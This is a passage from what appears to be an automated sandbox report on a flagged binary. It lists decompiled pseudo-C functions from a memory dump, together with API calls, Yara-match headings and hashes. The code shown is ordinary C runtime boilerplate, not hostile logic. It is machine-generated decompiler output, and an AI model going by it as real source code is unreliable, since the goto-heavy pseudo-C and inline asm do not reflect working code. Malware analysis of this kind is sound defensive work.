                                        				_t47 = _t40 & _t20;
                                        				_t21 = _t55 + 8; // 0x8
                                        				_t63 = _t21;
                                        				if((_t40 & _t20) > 0x400) {
                                        					asm("sbb eax, eax");
                                        					_t71 = E00403E3D(_t63, _t47 & _t63);
                                        					if(_t71 == 0) {
                                        						goto L14;
                                        					}
                                        					 *_t71 = 0xdddd;
                                        					L9:
                                        					_t71 =  &(_t71[4]);
                                        					goto L11;
                                        				}
                                        				asm("sbb eax, eax");
                                        				E004018E0();
                                        				_t71 = _t73;
                                        				if(_t71 == 0) {
                                        					goto L14;
                                        				}
                                        				 *_t71 = 0xcccc;
                                        				goto L9;
                                        			}
























                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                        • __alloca_probe_16.LIBCMT ref: 0040633D
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                        • __freea.LIBCMT ref: 004063A9
                                          • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 313313983-0
                                        • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                        • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                        • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                        • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E00405751(signed int _a4) {
                                        				signed int _t9;
                                        				void* _t13;
                                        				signed int _t15;
                                        				WCHAR* _t22;
                                        				signed int _t24;
                                        				signed int* _t25;
                                        				void* _t27;
                                        
                                        				_t9 = _a4;
                                        				_t25 = 0x412fc8 + _t9 * 4;
                                        				_t24 =  *_t25;
                                        				if(_t24 == 0) {
                                        					_t22 =  *(0x40cd48 + _t9 * 4);
                                        					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                        					if(_t27 != 0) {
                                        						L8:
                                        						 *_t25 = _t27;
                                        						if( *_t25 != 0) {
                                        							FreeLibrary(_t27);
                                        						}
                                        						_t13 = _t27;
                                        						L11:
                                        						return _t13;
                                        					}
                                        					_t15 = GetLastError();
                                        					if(_t15 != 0x57) {
                                        						_t27 = 0;
                                        					} else {
                                        						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                        						_t27 = _t15;
                                        					}
                                        					if(_t27 != 0) {
                                        						goto L8;
                                        					} else {
                                        						 *_t25 = _t15 | 0xffffffff;
                                        						_t13 = 0;
                                        						goto L11;
                                        					}
                                        				}
                                        				_t4 = _t24 + 1; // 0x368bd1fb
                                        				asm("sbb eax, eax");
                                        				return  ~_t4 & _t24;
                                        			}











                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                        • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                        • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                        • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                        • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 71%
                                        			E00404320(void* __ebx, void* __ecx, void* __edx) {
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t2;
                                        				void* _t3;
                                        				void* _t4;
                                        				intOrPtr _t9;
                                        				void* _t11;
                                        				void* _t20;
                                        				void* _t21;
                                        				void* _t23;
                                        				void* _t25;
                                        				void* _t27;
                                        				void* _t29;
                                        				void* _t31;
                                        				void* _t32;
                                        				long _t36;
                                        				long _t37;
                                        				void* _t40;
                                        
                                        				_t29 = __edx;
                                        				_t23 = __ecx;
                                        				_t20 = __ebx;
                                        				_t36 = GetLastError();
                                        				_t2 =  *0x412064; // 0x7
                                        				_t42 = _t2 - 0xffffffff;
                                        				if(_t2 == 0xffffffff) {
                                        					L2:
                                        					_t3 = E00403ECE(_t23, 1, 0x364);
                                        					_t31 = _t3;
                                        					_pop(_t25);
                                        					if(_t31 != 0) {
                                        						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                                        						__eflags = _t4;
                                        						if(_t4 != 0) {
                                        							E00404192(_t25, _t31, 0x4132a4);
                                        							E00403E03(0);
                                        							_t40 = _t40 + 0xc;
                                        							__eflags = _t31;
                                        							if(_t31 == 0) {
                                        								goto L9;
                                        							} else {
                                        								goto L8;
                                        							}
                                        						} else {
                                        							_push(_t31);
                                        							goto L4;
                                        						}
                                        					} else {
                                        						_push(_t3);
                                        						L4:
                                        						E00403E03();
                                        						_pop(_t25);
                                        						L9:
                                        						SetLastError(_t36);
                                        						E00403E8B(_t20, _t29, _t31, _t36);
                                        						asm("int3");
                                        						_push(_t20);
                                        						_push(_t36);
                                        						_push(_t31);
                                        						_t37 = GetLastError();
                                        						_t21 = 0;
                                        						_t9 =  *0x412064; // 0x7
                                        						_t45 = _t9 - 0xffffffff;
                                        						if(_t9 == 0xffffffff) {
                                        							L12:
                                        							_t32 = E00403ECE(_t25, 1, 0x364);
                                        							_pop(_t27);
                                        							if(_t32 != 0) {
                                        								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                                        								__eflags = _t11;
                                        								if(_t11 != 0) {
                                        									E00404192(_t27, _t32, 0x4132a4);
                                        									E00403E03(_t21);
                                        									__eflags = _t32;
                                        									if(_t32 != 0) {
                                        										goto L19;
                                        									} else {
                                        										goto L18;
                                        									}
                                        								} else {
                                        									_push(_t32);
                                        									goto L14;
                                        								}
                                        							} else {
                                        								_push(_t21);
                                        								L14:
                                        								E00403E03();
                                        								L18:
                                        								SetLastError(_t37);
                                        							}
                                        						} else {
                                        							_t32 = E00405878(_t25, _t45, _t9);
                                        							if(_t32 != 0) {
                                        								L19:
                                        								SetLastError(_t37);
                                        								_t21 = _t32;
                                        							} else {
                                        								goto L12;
                                        							}
                                        						}
                                        						return _t21;
                                        					}
                                        				} else {
                                        					_t31 = E00405878(_t23, _t42, _t2);
                                        					if(_t31 != 0) {
                                        						L8:
                                        						SetLastError(_t36);
                                        						return _t31;
                                        					} else {
                                        						goto L2;
                                        					}
                                        				}
                                        			}





















                                        0x004043af
                                        0x004043b1
                                        0x004043b3
                                        0x004043b8
                                        0x004043bb
                                        0x004043c9
                                        0x004043d5
                                        0x004043d8
                                        0x004043db
                                        0x004043ed
                                        0x004043f2
                                        0x004043f4
                                        0x004043ff
                                        0x00404405
                                        0x0040440d
                                        0x0040440f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004043f6
                                        0x004043f6
                                        0x00000000
                                        0x004043f6
                                        0x004043dd
                                        0x004043dd
                                        0x004043de
                                        0x004043de
                                        0x00404411
                                        0x00404412
                                        0x00404412
                                        0x004043bd
                                        0x004043c3
                                        0x004043c7
                                        0x0040441a
                                        0x0040441b
                                        0x00404421
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004043c7
                                        0x00404428
                                        0x00404428
                                        0x00404336
                                        0x0040433c
                                        0x00404340
                                        0x0040438b
                                        0x0040438c
                                        0x00404396
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404340

                                        APIs
                                        • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                        • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                        • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                        • _abort.LIBCMT ref: 0040439E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_abort
                                        • String ID:
                                        • API String ID: 88804580-0
                                        • Opcode ID: 748d6134d9c6c0cb73fdca7d7eb4e83c201390a1d6e057c9cacbb9a7c1b02d9b
                                        • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                        • Opcode Fuzzy Hash: 748d6134d9c6c0cb73fdca7d7eb4e83c201390a1d6e057c9cacbb9a7c1b02d9b
                                        • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004025BA() {
                                        				void* _t4;
                                        				void* _t8;
                                        
                                        				E00402AE5();
                                        				E00402A79();
                                        				if(E004027D9() != 0) {
                                        					_t4 = E0040278B(_t8, __eflags);
                                        					__eflags = _t4;
                                        					if(_t4 != 0) {
                                        						return 1;
                                        					} else {
                                        						E00402815();
                                        						goto L1;
                                        					}
                                        				} else {
                                        					L1:
                                        					return 0;
                                        				}
                                        			}






                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                          • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                        • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                        Uniqueness

                                        Uniqueness Score: -1.00%